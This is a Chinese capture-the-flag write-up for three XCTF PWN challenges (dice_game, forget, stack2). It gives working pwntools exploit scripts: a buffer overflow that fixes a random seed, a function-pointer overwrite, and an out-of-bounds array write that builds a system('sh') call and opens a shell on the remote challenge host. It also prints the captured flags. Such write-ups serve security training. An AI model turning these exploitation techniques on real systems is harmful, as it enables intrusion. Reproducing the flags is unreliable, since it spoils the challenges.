攻防世界PWN高手进阶区

dice_game

溢出＋随机数

from pwn import *
from ctypes import *
import re

context.log_level = 'Debug'

libc = cdll.LoadLibrary("libc.so.6")

#io = process('./dice_game')
io = remote('111.198.29.45', '43224')

payload = 'a' * 0x40 + p64(1)
io.sendlineafter("Welcome, let me know your name: ", payload)

libc.srand(1)
for i in range(50):
	randnum = (libc.rand()) % 6 + 1
	io.sendlineafter("point(1~6): ", str(randnum))

io.recvline()
io.recvline()
flag = io.recvline()
print flag

flag

1	cyberpeace{d852e3567fa642894b4bad82042d53a5}

forget

溢出，将v3修改为getflag的函数的地址，使用\x47作为padding即可使得v14为1

from pwn import *

context.log_level = 'Debug'

#io = process('./forget')
io = remote('111.198.29.45', '32456')

payload = '\x47' * 32 + p32(0x080486CC)

io.sendlineafter('>', 'hvnt3r')
io.sendlineafter('Enter the string to be validate\n>', payload)

io.recvline()

flag

1	cyberpeace{36db2d4142ff5529b834e236e2e3c641}

stack2

数组未检查范围导致溢出：

puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;

下断点确认v13起始地址与ebp的距离为0x84，构造sh的system函数栈帧。

from pwn import *

context.log_level = 'Debug'

io = process('./6abe739ff2af4a7fa6b3c89904389817')
io = remote('111.198.29.45', '48396')

io.sendlineafter('How many numbers you have:\n', '1')
io.sendlineafter('Give me your numbers\n', '1')

def write_addr(offset, byte):
	io.sendlineafter('5. exit\n', '3')
	io.sendlineafter('which number to change:\n', str(offset))
	io.sendlineafter('new number:\n', str(byte))
	
#08048450   sys_plt
write_addr(0x84, 0x50)
write_addr(0x85, 0x84)
write_addr(0x86, 0x04)
write_addr(0x87, 0x08)

#08048987   string_sh
write_addr(0x84 + 8, 0x87)
write_addr(0x85 + 8, 0x89)
write_addr(0x86 + 8, 0x04)
write_addr(0x87 + 8, 0x08)

io.sendlineafter('5. exit\n', '5')

io.interactive()